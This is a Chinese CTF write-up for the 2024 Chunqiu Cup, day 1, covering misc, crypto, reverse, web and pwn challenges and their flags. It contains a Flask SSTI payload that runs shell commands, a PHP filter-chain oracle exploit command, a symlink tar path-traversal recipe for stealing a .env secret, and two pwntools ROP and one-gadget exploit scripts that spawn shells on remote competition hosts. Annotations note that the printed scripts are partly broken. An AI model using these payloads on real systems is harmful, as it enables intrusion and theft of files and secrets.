Misc
See anything in these pics?
爆破压缩包,密码是5FIVE
Foremost提取出来一张黑色的png
然后爆破宽高,我用的是https://github.com/AabyssZG/Deformed-Image-Restorer
简单镜像提取
使用神秘小工具一键导出所有文件
出来一个zip,解压得到img,用rrstudio恢复之后得到一个xls,打开得到flag:flag{E7A10C15E26AA5750070EF756AAA1F7C}
压力大,写个脚本吧
用下面的脚本直接批量解压
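import zipfile
import os
import base64


def decode_password(encoded_password: str) -> str:
    """Return the plaintext password stored base64-encoded in a password_N.txt file.

    Args:
        encoded_password: the file's text; surrounding whitespace/newlines are ignored.

    Raises:
        binascii.Error: if the text is not valid base64.
        UnicodeDecodeError: if the decoded bytes are not UTF-8.
    """
    return base64.b64decode(encoded_password.strip()).decode("utf-8")


def extract_numbered_zips(directory: str, first: int = 99, last: int = 1) -> list[str]:
    """Extract zip_N.zip into *directory* with the password read from password_N.txt.

    N runs from *first* down to *last* inclusive, i.e. the same descending order
    (99, 98, ..., 1) as the original one-off script. The order looks deliberate —
    presumably each archive yields the next password/zip pair — so it is kept;
    TODO confirm against the challenge layout.

    Args:
        directory: folder holding the password_N.txt / zip_N.zip pairs; extracted
            members are written there as well.
        first: highest N to process.
        last: lowest N to process.

    Returns:
        The paths of the archives that were extracted, in processing order.

    Raises:
        FileNotFoundError: if a password file or archive for some N is missing.
        RuntimeError: raised by zipfile when the password is wrong.
    """
    extracted: list[str] = []
    for n in range(first, last - 1, -1):
        password_file = os.path.join(directory, f"password_{n}.txt")
        zip_file = os.path.join(directory, f"zip_{n}.zip")
        with open(password_file, "r", encoding="utf-8") as f:
            password = decode_password(f.read())
        # ZipFile.extractall() strips absolute paths and ".." components from
        # member names, so a crafted archive cannot write outside *directory*;
        # it still overwrites existing files there, which this script relies on.
        with zipfile.ZipFile(zip_file) as zf:
            zf.extractall(path=directory, pwd=password.encode("utf-8"))
        extracted.append(zip_file)
    return extracted


if __name__ == "__main__":
    extract_numbered_zips(os.getcwd())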
然后合并全部txt,删掉最后的FGFGFG,再base64解码,最后16进制转图片得到一个二维码
https://rd.wechat.com/qrcode/confirm?block_type=101&content=flag%7B%5FPASSWORDs%5Fis%5Ffl%40g%21%5F%7D
简单算术
异或
Crypto
你是小哈斯?
Sha1,直接爆破就行,我驯服GPT写的
4a0a19218e082a343a1b17e5333409af9d98f0f5 => f
07c342be6e560e7f43842e2e21b774e61d85f047 => l
86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 => a
54fd1711209fb1c0781092374132c66e79e2241b => g
60ba4b2daa4ed4d070fec06687e249e0e6f9ee45 => {
54fd1711209fb1c0781092374132c66e79e2241b => g
86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 => a
6b0d31c0d563223024da45691584643ac78c96e8 => m
58e6b3a414a1e090dfc6029add0f3555ccba127f => e
53a0acfad59379b3e050338bf9f23cfc172ee787 => _
84a516841ba77a5b4648de2cd0dfcb30ea46dbb4 => c
22ea1c649c82946aa6e479e1ffd321e4a318b1b0 => q
e9d71f5ee7c92d6dc9e92ffdad17b8bd49418f98 => b
53a0acfad59379b3e050338bf9f23cfc172ee787 => _
042dc4512fa3d391c5170cf3aa61e6a638f84342 => i
a0f1490a20d0211c997b44bc357e1972deab8ae3 => s
042dc4512fa3d391c5170cf3aa61e6a638f84342 => i
a0f1490a20d0211c997b44bc357e1972deab8ae3 => s
53a0acfad59379b3e050338bf9f23cfc172ee787 => _
84a516841ba77a5b4648de2cd0dfcb30ea46dbb4 => c
11f6ad8ec52a2984abaafd7c3b516503785c2072 => x
95cb0bfd2977c761298d9624e4b4d4c72a39974a => y
395df8f7c51f007019cb30201c49e884b46b92fa => z
c2b7df6201fdd3362399091f0a29550df3505b6a => }
flag{game_cqb_isis_cxyz}
通往哈希的旅程
ca12fd8250972ec363a16593356abb1f3cf3a16d
cmd5花重金买的
18876011645
Reverse
Ezgo
爆破即可,最后密码是oadi,密码正确以后zip中的txt就可读了(有时候会失败,要重新解压重新输入密码,貌似2025也可以,应该算个非预期(?))
Web
file_copy
直接用
https://github.com/synacktiv/php_filter_chains_oracle_exploit
python3 filters_chain_oracle_exploit.py --target url --file '/flag' --parameter path
这个只能在linux下跑,windows会报错,且Linux回显很慢
easy_flask
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat /app/flag').read() }}
ssti注入(希望出题人声明flag位置,我/flag读不到 env也没有差点破防了)
Gotar
Tar路径穿越
先软连接构造一个恶意tar
mkdir 1
cd 1
ln -s ../../../.env 2
cd ../
tar -cf 3.tar 1
上传3.tar,得到真正的密钥,如下:
SfaVqVGfLOKk7Gp912kPe0Li47AEQM4iYNbBx1WVrWA=
看token,是个jwt
然后直接塞hackbar并读取flag
Pwn
Gender_Simulation
# Exploit script reproduced from the writeup for the "Gender_Simulation" pwn
# challenge; it was run against the competition's remote service.
# NOTE(review): the listing was extracted from a web page and the backslashes
# of its escape sequences appear to be missing (b'x00', b'n', 'Boyn2.'), so
# treat it as illustrative rather than runnable as printed.
from pwn import *
binary = './pwn'
elf = ELF(binary)
libc = ELF('./libc.so.6')
context.log_level = 'debug'
context.arch = elf.arch
context.terminal = ['tmux', 'neww']
# Thin aliases over the pwntools tube `io`, which is only created further down.
send = lambda data: io.send(data)
send_after = lambda delim, data: io.sendafter(delim, data)
send_line = lambda data: io.sendline(data)
send_line_after = lambda delim, data: io.sendlineafter(delim, data)
recv = lambda num_bytes=4096: io.recv(num_bytes)
recv_until = lambda delims, drop=True: io.recvuntil(delims, drop)
# NOTE(review): these rebind pwntools' u32/u64 to lambdas that call themselves,
# so invoking either would recurse forever; neither is used below.
u32 = lambda data: u32(data.ljust(4, b'x00'))
u64 = lambda data: u64(data.ljust(8, b'x00'))
interactive = lambda: io.interactive()
io = remote('39.106.48.123', 38698)
# The service prints an address after "A gift: "; it is parsed as hex and
# rebased against libc's setvbuf symbol to recover the libc load address.
recv_until(b'A gift: ')
leaked_addr = int(recv_until(b'n'), 16)
libc_base = leaked_addr - libc.sym.setvbuf
log.info(f"libc_base = {hex(libc_base)}")
# Menu navigation: answer "2" to both prompts.
recv_until(b'Choose onen1. Boyn2. Girln')
send_line(b'2')
recv_until(b'2. Tomboyn')
send_line(b'2')
recv_until(b'certificaten')
# Gadget/address constants below are taken verbatim from the writeup; the
# binary-specific offsets are not derivable from this page.
pop_rdi = libc_base + 0x000000000010f75b
ret_addr = 0x000000000040201a
system_addr = libc.sym.system + libc_base
bin_sh_addr = next(libc.search(b'/bin/sh')) + libc_base
send_line(p64(0x0004025E6))
recv_until(b'If you think you')
send(b'a' * 0x18 + p64(pop_rdi) + p64(bin_sh_addr) + p64(ret_addr) + p64(system_addr))
interactive()
Bypass
# Exploit script reproduced from the writeup for the "Bypass" pwn challenge;
# it was run against the competition's remote service.
# NOTE(review): the listing was extracted from a web page: escape-sequence
# backslashes appear to be missing (b'x00') and `defget_shell` has lost the
# space after `def`, so treat it as illustrative rather than runnable as printed.
from pwn import *
import time
local_file = './pwn'
elf = ELF(local_file)
libc = ELF('./libc.so.6')
context.log_level = 'debug'
context.arch = elf.arch
context.terminal = ['tmux', 'neww']
# Thin aliases over the pwntools tube `io`, which is only created further down.
send = lambda data: io.send(data)
send_after = lambda delim, data: io.sendafter(delim, data)
send_line = lambda data: io.sendline(data)
send_line_after = lambda delim, data: io.sendlineafter(delim, data)
recv = lambda numb=4096: io.recv(numb)
recv_until = lambda delims, drop=True: io.recvuntil(delims, drop)
# Unlike the previous script these wrappers use fresh names, so pwntools'
# own u32/u64 are still the ones being called.
unpack32 = lambda data: u32(data.ljust(4, b'x00'))
unpack64 = lambda data: u64(data.ljust(8, b'x00'))
# NOTE(review): `np` is never imported in this listing, so calling either of
# these would raise NameError; neither is used below.
get_qword = lambda data: (~np.uint64(data) + 1)
get_dword = lambda data: (~np.uint32(data) + 1)
# Unused helper; reads the module-level `libc_base` assigned further down.
defget_shell():
return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/shx00'))
info_address = lambda tag, addr: io.info(tag + '==>' + ': {:#x}'.format(addr))
interact = lambda: io.interactive()
io = remote('8.147.132.32', 39949)
send(p8(2) * 4)
recv_until('d')
recv_until('n')
# Six leaked bytes are zero-padded to a qword and rebased against libc's
# puts symbol to recover the libc load address.
libc_base = unpack64(recv(6)) - libc.sym.puts
send(p8(0) * 4)
# Offset taken verbatim from the writeup; it is specific to the shipped libc
# and not derivable from this page.
one_gadget = 0x4f302
send(b'KEY: ' + b'a' * 19 + p8(0x14) + p8(0x2) + b'c' * 8 + p64(one_gadget + libc_base))
# Short pause so the two sends are not coalesced into one read by the service.
time.sleep(0.1)
send(b'VAL: ' + b'b' * 512)
interact()
团队官网:https://www.hdsec.cn/
我们在https://www.hdsec.cn/tools/intranet/intranet.html收集了大量渗透中会用到的命令,欢迎各位师傅使用
原文始发于微信公众号(黄豆安全实验室):2024春秋杯day1 WP